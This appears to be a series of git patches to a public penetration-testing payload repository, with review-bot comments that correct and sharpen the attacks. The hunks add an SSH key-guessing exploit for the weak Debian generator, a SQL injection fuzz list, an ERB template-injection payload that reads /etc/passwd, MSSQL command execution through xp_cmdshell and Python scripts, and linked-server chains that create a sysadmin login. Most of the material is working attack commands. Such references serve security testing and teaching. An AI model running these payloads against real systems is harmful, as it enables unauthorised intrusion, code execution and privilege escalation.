diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 63346eb..a728c33 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -431,6 +431,19 @@ lua: os.execute('/bin/sh') - nmap: `!sh` - mysql: `! bash` +Alternative TTY method + +``` +www-data@debian:/dev/shm$ su - user +su: must be run from a terminal + +www-data@debian:/dev/shm$ /usr/bin/script -qc /bin/bash /dev/null +www-data@debian:/dev/shm$ su - user +Password: P4ssW0rD + +user@debian:~$ +``` + ## Fully interactive reverse shell on Windows The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals. From c4af354d8f410caeebbe9dc5fc8172107cc8733b Mon Sep 17 00:00:00 2001 From: bohdansec <51418565+bohdansec@users.noreply.github.com> Date: Wed, 22 Apr 2020 00:51:36 +0300 Subject: [PATCH 34/85] Update Cloudflare XSS bypasses Add 3 bypasses by Bohdan Korzhynskyi. Update twitter --- XSS Injection/README.md | 22 +++++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 1fe1978..8b46e60 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -975,7 +975,27 @@ Works for CSP like `script-src 'self' data:` ## Common WAF Bypass -### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019 +### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec) + +#### 21st april 2020 + +```html + +``` + +#### 22nd august 2019 + +```html + +``` + +#### 3rd june 2019 ```html From c2b8018617a72e13a3a3c1cb2bfa13d8878d8aa4 Mon Sep 17 00:00:00 2001 From: Heeryong Kang Date: Wed, 22 Apr 2020 16:09:18 +0900 Subject: [PATCH 35/85] fix typo --- CORS Misconfiguration/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
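Review bot: in the `Alternative TTY method` hunk the code fence has no language tag while the rest of this cheatsheet tags shell blocks `powershell`; add the tag. `script -qc /bin/bash /dev/null` is the util-linux syntax; the BSD/macOS `script` takes the command after the file (`script -q /dev/null /bin/bash`), which is worth one line since this trick is used on whatever box you land on. Also `su` does not echo the password, so the transcript should show `Password:` alone rather than `Password: P4ssW0rD`.

Review bot: the three `html` fences in the Cloudflare XSS bypass hunk render empty here; the payloads contain tags that markdown renderers and HTML sanitisers strip, so verify the committed file actually holds them and consider escaping them or keeping a plain-text copy where they survive.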
diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 7d4d715..1bbbc7e 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -131,7 +131,7 @@ https://trusted-origin.example.com/?xss= ### Vulnerable Example: Wildcard Origin `*` without Credentials If the server responds with a wildcard origin `*`, the browser does never send -the cookies. Howver, if the server does not require authentication, it's still +the cookies. However, if the server does not require authentication, it's still possible to access the data on the server. This can happen on internal servers that are not accessible from the Internet. The attacker's website can then pivot into the internal network and access the server's data withotu From 2e507a2b2f82d03151a872c058377efca5d1cebf Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Wed, 22 Apr 2020 15:55:10 +0200 Subject: [PATCH 36/85] Linux privesc - SSH Key Predictable PRNG (Authorized_Keys) Process --- .../Linux - Privilege Escalation.md | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 26847cb..d7a9237 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md 
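Review bot: the `Howver` to `However` fix leaves `withotu` two lines below it, in the unchanged context of the same paragraph (`access the server's data withotu`); fix it in this commit rather than in a follow-up.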
@@ -182,6 +182,61 @@ $ locate password | more ... ``` +## SSH Key + +### Sensitive files + +``` +find / -name authorized_keys 2> /dev/null +find / -name id_rsa 2> /dev/null +... +``` + +### SSH Key Predictable PRNG (Authorized_Keys) Process + +This module describes how to attempt to use an obtained authorized_keys file on a host system. + +Needed : SSH-DSS String from authorized_keys file + +**Steps** + +1. Get the authorized_keys file. An example of this file would look like so: + +``` +ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... +``` + +2. Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`: + +``` +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshs_config +/etc/init.d/ssh restart +``` + +3. Get [g0tmi1k's debian-ssh repository](https://github.com/g0tmi1k/debian-ssh) and unpack the keys: + +``` +git clone https://github.com/g0tmi1k/debian-ssh +cd debian-ssh +tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2 +``` + +4. Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as: + +``` +grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' +dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub +``` + +5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do: + +``` +ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 +``` + +And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why. + ## Scheduled tasks ### Cron jobs 
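Review bot: in the `SSH Key Predictable PRNG` hunk, step 2 writes to `/etc/ssh/sshs_config`, a typo for `sshd_config`, and the `sshd_config` edit plus `/etc/init.d/ssh restart` are not needed for this attack anyway: step 5 uses the ssh client, which only reads `ssh_config` (or `-o PubkeyAcceptedKeyTypes=+ssh-dss` on the command line); it is the target's sshd that must still accept `ssh-dss`. Step 1's sample `ssh-dss AAAA487rt...` is not a real key blob (ssh-dss keys start with `AAAAB3NzaC1kc3M`), so label it as a placeholder so nobody greps for it. In step 4 `grep -lr '...'` has no path argument and therefore walks the whole clone; pass `dsa/1024/` (the directory the match comes from) to keep it fast. In `Sensitive files`, `find / -name id_rsa` misses `id_dsa`, `id_ecdsa` and `id_ed25519`; `find / -name 'id_*' -not -name '*.pub' 2>/dev/null` covers them.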
@@ -697,3 +752,4 @@ https://www.exploit-db.com/exploits/18411 - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) * [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) +* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md) From 14d03b96a1608e5c13592b3850a21dcd858226d6 Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Wed, 22 Apr 2020 16:00:31 +0200 Subject: [PATCH 37/85] Linux privesc - SSH Key Predictable PRNG (Authorized_Keys) Process - Summary --- Methodology and Resources/Linux - Privilege Escalation.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index d7a9237..d7a1d78 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -10,6 +10,9 @@ * [Last edited files](#last-edited-files) * [In memory passwords](#in-memory-passwords) * [Find sensitive files](#find-sensitive-files) +* [SSH Key](#ssh-key) + * [Sensitive files](##sensitive-files) + * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs) * [Systemd timers](#systemd-timers) From 7c8e9ac4ce1d36ff0eec7ce4cd4922e6690632b3 Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Wed, 22 Apr 2020 16:01:49 +0200 Subject: [PATCH 38/85] Typo --- Methodology and Resources/Linux - Privilege Escalation.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index d7a1d78..ae1705c 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -11,7 +11,7 @@ * [In memory passwords](#in-memory-passwords) * [Find sensitive files](#find-sensitive-files) * [SSH Key](#ssh-key) - * [Sensitive files](##sensitive-files) + * [Sensitive files](#sensitive-files) * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs) From bdf06d4183462045000f39d28e022aa59af52f42 Mon Sep 17 00:00:00 2001 From: Pascal Schulz Date: Thu, 23 Apr 2020 13:11:51 +0200 Subject: [PATCH 39/85] added Hacksplained's YT channel --- YOUTUBE.md | 1 + 1 file changed, 1 insertion(+) diff --git a/YOUTUBE.md b/YOUTUBE.md index ba90f41..c1ed1b9 100644 --- a/YOUTUBE.md +++ b/YOUTUBE.md @@ -9,6 +9,7 @@ - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A) - [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A) - [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg) +- [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained) ## Conferences From 04899355adfd17bbdf468d1e8c863ebb3b2e6161 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 26 Apr 2020 21:43:42 +0200 Subject: [PATCH 40/85] Magic Hashes + SQL fuzz --- .../Cloud - Azure Pentest.md | 15 ++++++++++++++- .../Network Pivoting Techniques.md | 3 +++ SQL Injection/Intruder/Generic_Fuzz.txt | 12 ++++++++++++ Type Juggling/README.md | 6 +++++- 4 files changed, 34 insertions(+), 2 deletions(-) create mode 100644 SQL Injection/Intruder/Generic_Fuzz.txt 
diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 9c4d692..7a3c720 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -7,6 +7,7 @@ * [Azure Storage Account - Access](#azure-storage-account----access) * [Azure AD vs Active Directory](#azure-ad-vs-active-directory) * [Azure AD - Enumeration](#azure-ad---enumeration) +* [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid) * [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal) * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction) * [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync) @@ -285,6 +286,17 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online 3. Pick the account from the active sessions 4. Select Azure Active Directory and enjoy! +## Azure AD - Convert GUID to SID + +The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. + +```powershell +GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] +SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] +``` + +For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` + ## Azure AD - Sign in with a service principal https://docs.microsoft.com/en-us/powershell/azure/authenticate-azureps?view=azps-3.3.0&viewFallbackFrom=azurermps-6.5.0#sign-in-with-a-service-principal 
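Review bot: the new `Azure AD - Convert GUID to SID` section has two problems. The dashes in `S-1–12–1-` and in the example GUID and SID are typographic en dashes (`–`), not ASCII `-`, so anyone copy-pasting gets an invalid SID; replace them. More importantly, the stated rule (`base10` of each GUID section) does not reproduce the section's own example: the second sub-authority `1301421967` is `0x4d921f8f`, i.e. GUID groups three and two (`4d92` + `1f8f`) concatenated, and `3702525313` / `2188119011` are `0xdcb00d81` / `0x826c0be3`, i.e. the last eight bytes `810db0dc e30b6c82` read as two little-endian 32-bit integers. The actual rule is: take the GUID's 16 bytes in the order `Guid.ToByteArray()` returns them (first three groups little-endian, the remaining eight bytes as written) and split them into four little-endian uint32 values, which gives `6aa89ecb` -> 1789435595, `4d921f8f` -> 1301421967, `dcb00d81` -> 3702525313, `826c0be3` -> 2188119011. Describe that, or state it as `[BitConverter]::ToUInt32($guid.ToByteArray(), $i*4)` for `$i` in 0..3.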
@@ -443,4 +455,5 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an * [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) * [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) * [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) -* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) \ No newline at end of file +* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) +* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 2fa5a50..f2fbcd6 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -151,6 +151,9 @@ pacman -Sy sshuttle apt-get install sshuttle sshuttle -vvr user@10.10.10.10 10.1.1.0/24 sshuttle -vvr username@pivot_host 10.2.2.0/24 + +# using a private key +$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" ``` ## chisel diff --git a/SQL Injection/Intruder/Generic_Fuzz.txt b/SQL Injection/Intruder/Generic_Fuzz.txt new file mode 100644 index 0000000..624fb4d --- /dev/null +++ b/SQL Injection/Intruder/Generic_Fuzz.txt @@ -0,0 +1,12 @@ +1 +1' +1" +[1] +1` +1\ +1/*'*/ +1/*!1111'*/ +1'||'asd'||' +1' or '1'='1 +1 or 1=1 +'or''=' \ No newline at end of file 
diff --git a/Type Juggling/README.md b/Type Juggling/README.md index c51c805..7e97f99 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -42,9 +42,13 @@ var_dump(md5([])); # NULL If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float. -| Hash | “Magic” Number / String | Magic Hash | Found By | +| Hash | “Magic” Number / String | Magic Hash | Found By / Description | | ---- | -------------------------- |:---------------------------------------------:| -------------:| | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? | | SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | | SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) | | SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) | From 7f1fb329806d038c52ec7457ba077faa23eff3c3 Mon Sep 17 00:00:00 2001 From: idealphase Date: Thu, 30 Apr 2020 17:13:58 +0700 Subject: [PATCH 41/85] Adding Execute code using SSTI for ERB engine. --- Server Side Template Injection/README.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) 
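Review bot: the new row `129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=?` does not belong in this table as introduced: the sentence above it says PHP treats hashes starting with `0e` as floats, and this hash starts with `06`. It is a different trick, raw-binary output (`md5($x, true)`) whose bytes contain `'or'8`, which breaks out of a string when the raw digest is concatenated into SQL. Give it its own short paragraph with the `md5(..., true)` context instead of a table row, and render the raw bytes as hex rather than `?` placeholders, which lose the information.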
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 5998047..29ede3d 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -97,6 +97,12 @@ Execute code using SSTI for Slim engine. #{ %x|env| } ``` +Execute code using SSTI for ERB engine. + +```ruby +<%= system('cat /etc/passwd') %> +``` + ## Java ### Basic injection @@ -452,4 +458,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) * [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) -* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) \ No newline at end of file +* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) From 712e3b93f6b39d70a302034caebf1503da307bc4 Mon Sep 17 00:00:00 2001 From: idealphase Date: Thu, 30 Apr 2020 17:15:31 +0700 Subject: [PATCH 42/85] Sorting like basic injection part --- Server Side Template Injection/README.md | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 29ede3d..687a319 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
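Review bot: `<%= system('cat /etc/passwd') %>` in the new ERB example does not put the file in the rendered page: `system` writes the command's output to the server process's stdout and the template only receives `true`. Use backticks or `%x`, as the Slim example next to it does, e.g. `<%= %x(cat /etc/passwd) %>`, so the output lands in the response.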
@@ -91,17 +91,16 @@ Slim: ### Code execution -Execute code using SSTI for Slim engine. - -```powershell -#{ %x|env| } -``` - Execute code using SSTI for ERB engine. ```ruby <%= system('cat /etc/passwd') %> ``` +Execute code using SSTI for Slim engine. + +```powershell +#{ %x|env| } +``` ## Java From da5dc1299e2f174e49b0cbdfcea32ed4f22c555c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 1 May 2020 12:06:18 +0200 Subject: [PATCH 43/85] MSSQL Trusted Link --- SQL Injection/MSSQL Injection.md | 59 ++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 0e79365..2be3918 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -17,6 +17,7 @@ * [MSSQL Command execution](#mssql-command-execution) * [MSSQL UNC path](#mssql-unc-path) * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) +* [MSSQL Trusted Links](#mssql-trusted-links) ## MSSQL comments @@ -25,6 +26,12 @@ /* comment goes here */ ``` +## MSSQL User + +```sql +SELECT CURRENT_USER +``` + ## MSSQL version ```sql 
@@ -162,6 +169,25 @@ sqsh -S 192.168.1.X -U sa -P superPassword python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758 ``` +Execute Python script + +> Executed by a different user than the one using xp_cmdshell to execute commands + +```powershell +#Print the user being used (and execute commands) +EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' +EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))' +#Open and read a file +EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' +#Multiline +EXECUTE sp_execute_external_script @language = N'Python', @script = N' +import sys +print(sys.version) +' +GO +``` + + ## MSSQL UNC Path MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. 
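Review bot: `SELECT CURRENT_USER` in the new `MSSQL User` section returns the database user (typically `dbo` or `guest`), not the login; add `SELECT SYSTEM_USER` (or `SUSER_NAME()`) and `SELECT IS_SRVROLEMEMBER('sysadmin')`, since the login and its server role are what decide whether `xp_cmdshell` further down is reachable. In the `Execute Python script` hunk the block is T-SQL but is fenced `powershell` and commented with `#`, which T-SQL does not accept, so it cannot be pasted as-is; use `--` comments. Two caveats belong in the text: `sp_execute_external_script` only works when Machine Learning Services (Python) is installed and `external scripts enabled` has been set through `sp_configure`, and `print(__import__("os").system("whoami"))` prints the exit status (`0`), the command's own output arriving separately through the script's stdout.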
@@ -176,8 +202,41 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; ``` +## MSSQL Trusted Links + +> The links between databases work even across forest trusts. + +```powershell +msf> use exploit/windows/mssql/mssql_linkcrawler +[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio +``` + +Manual exploitation + +```sql +-- find link +select * from master..sysservers + +-- execute query through the link +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +select version from openquery("linkedserver", 'select @@version as version'); + +-- chain multiple openquery +select version from openquery("link1",'select version from openquery("link2","select @@version as version")') + +-- execute shell commands +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') + +-- create user and give admin privileges +EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +``` + ## References * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/) * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf) +* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links) +* [SQL Server – Link… Link… Link… and 
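Review bot: in the `MSSQL Trusted Links` hunk, enabling `xp_cmdshell` through the link with `EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer` will fail unless `show advanced options` is turned on first (`sp_configure ''show advanced options'',1;reconfigure;` in the same `EXECUTE ... AT`), and `EXECUTE ... AT` only works when the link has RPC Out enabled; the `openquery` form does not need RPC Out but needs `xp_cmdshell` already on, so say which to try when. The msf snippet has `sessio` for `session`. The context line just above the hunk, `EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;`, is missing its closing quote; fix it while touching this file.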
Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) \ No newline at end of file From e9b296adb3aca9bcaf3f80b6d56d78c67e8158e3 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 2 May 2020 14:31:33 +0200 Subject: [PATCH 44/85] DoyenSec Payloads XSS Google Scholar --- .../payload_in_all_known_exif_corrupted.jpg | Bin 0 -> 32464 bytes .../payload_in_all_known_exif_corrupted.png | Bin 0 -> 45572 bytes .../Files/payload_in_all_known_metadata.jpg | Bin 0 -> 28581 bytes .../Files/payload_in_all_known_metadata.png | Bin 0 -> 39710 bytes XSS Injection/Files/payload_text_xss.png | Bin 0 -> 28082 bytes 5 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg create mode 100644 XSS Injection/Files/payload_in_all_known_exif_corrupted.png create mode 100644 XSS Injection/Files/payload_in_all_known_metadata.jpg create mode 100644 XSS Injection/Files/payload_in_all_known_metadata.png create mode 100644 XSS Injection/Files/payload_text_xss.png 
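Review bot: in the "MSSQL Trusted Links" hunk, the chained example `select version from openquery("link1",'select version from openquery("link2","select @@version as version")')` passes the innermost query as a double-quoted token; OPENQUERY's second argument must be a string literal, and with the default QUOTED_IDENTIFIER ON a double-quoted token is parsed as an identifier, so this only works if the remote session runs with QUOTED_IDENTIFIER OFF. The portable form doubles the single quotes inside the outer literal: `openquery("link2",''select @@version as version'')`. The line `EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer` also leaves out two prerequisites worth a sentence: `EXECUTE ... AT` requires RPC Out to be enabled on the link (`EXEC sp_serveroption 'LinkedServer','rpc out','true'`, which the login behind the link may not be permitted to change), and `xp_cmdshell` is an advanced option, so `sp_configure 'show advanced options',1; reconfigure;` has to run first. Minor: "sessio" in the DEPLOY comment should read "session", and the blockquote speaks of links between databases whereas these are linked servers, instance-level objects, which is what the `master..sysservers` query lists.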
diff --git a/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg b/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg new file mode 100644 index 0000000000000000000000000000000000000000..ad73a45632f657592b89b84c07769822e619ec94 GIT binary patch literal 32464
[base85-encoded binary image data, not shown]
zp|XRgdKyJgx88w0;e2ZQ4`Q}YlghC2AENx+TF)mpVo%m4akJt8eSJT})=;nep5{i4 zsRy7Rcg$?`yV^CcI@u?1!QlvTqpE#by3!Sj*TMxjvs1&b8c1Q+OCw4v z)bk4fBx+md*CJ;++v2&t28Mu{fk$+H;z+62)hV7}`cWS%p1N^6=uhaGTJLr+A@UN% zdSimQd%-^me^w3}j>dT=$O!iOF~O)y{uk8aA(fNhwo($2 z9mS*X#3!<45qPRm%c4veap{BzW$BDR+RnD4b3E;QKU-IvKVgO9T4>rowa@K{&*2 ziEG6QKQ&`>ba2i zd3ur%rify%ad?u$a*vChiSuI28yh;GLLU=5+QqOOH>vU| z#oI8sodj{LPYe{L5^=9-n|bj+iwZ`88pN%oNXfh`DKj~kox;eR@==0Q%n04kLvZL+Qeb8Xl8}N6E`C1>nZfPfIuqvRmdy39HVhOf9!2eXdO;@p zk^W>iGU%;O$EbThv~O5-cyUZ^ECTW@D06oPHvX(rS6x>Ul|Y<0~(s z7E&quFQff@Zwj;WGk1Btw!Ac0#zc}C{Y-b=PjukugmDwThBMcE$!#c1D_2nV=f^Ys zRRZy-^SFInEcPPrXu28=up)?_O}$c zf4p4Xe58s+#maVIqDIVA0Dl-l$XhOXoCCjR*PJbai7w+Gdo;2*}SzIb$q(wAEe znkX2#^d9T~DwWsTsR;8?Y9@zUF_Fpj|J;8kkED*C#)}y z=xRVObAHzGMccI=1uQECi^Z*@MIY`$B|MDUAyQ{i{rI0n;5lyrbXwf%PcuMUUeK@? z;RNI;gIJN@@Xp*W3I*R0NdY9RkSCakDO9G7Gq;c!7cVg4Uc;%tT^xlO1@V(9b<-7L zw?g>*q$)cqbSsN5lNtyR!)5goL(^cllGf6Jt6ryzm#X>Zzfncjc)de$L0e8HX5uFrGJd)FdjRzIr!;R@KMXSQQIaGiWIeJEM7W@MLL=Qc7)yOwy^m;u zXkB=cx1hMmM6D2*(7bs}*TjC=*nHWhcmus)$=|SZ@wDDQTsO5~+c99{6^qSqZH`gz zES^BTwTdH9CxigNB*;G=>2MQ!19H*@@vfMjn>*_}QZB{n$Vp}=lI66EX|_+RFaR~1 z`BZ_SUnr?$p!ECfIH=T0zV2=><8fYjj+h28h_Y=jb3wjyigpAhNLrd8y80%B%BEk1 zzbgCj9{wJ`UDds7hi z&-H7Cj=`MW&?|~WS}7;N zCC@5NH9Sl8f2Z+$g28pE>VoBCd$21lo>9uZ3)xMgJRtGi2eKRK?XAVVdM28139F~( z{iOf4Kx0Ld`l3XPEaQZH(UrlT{fq|0x3#+XhcPG9ww@-Ul;bYI=yTzkjr1lIv 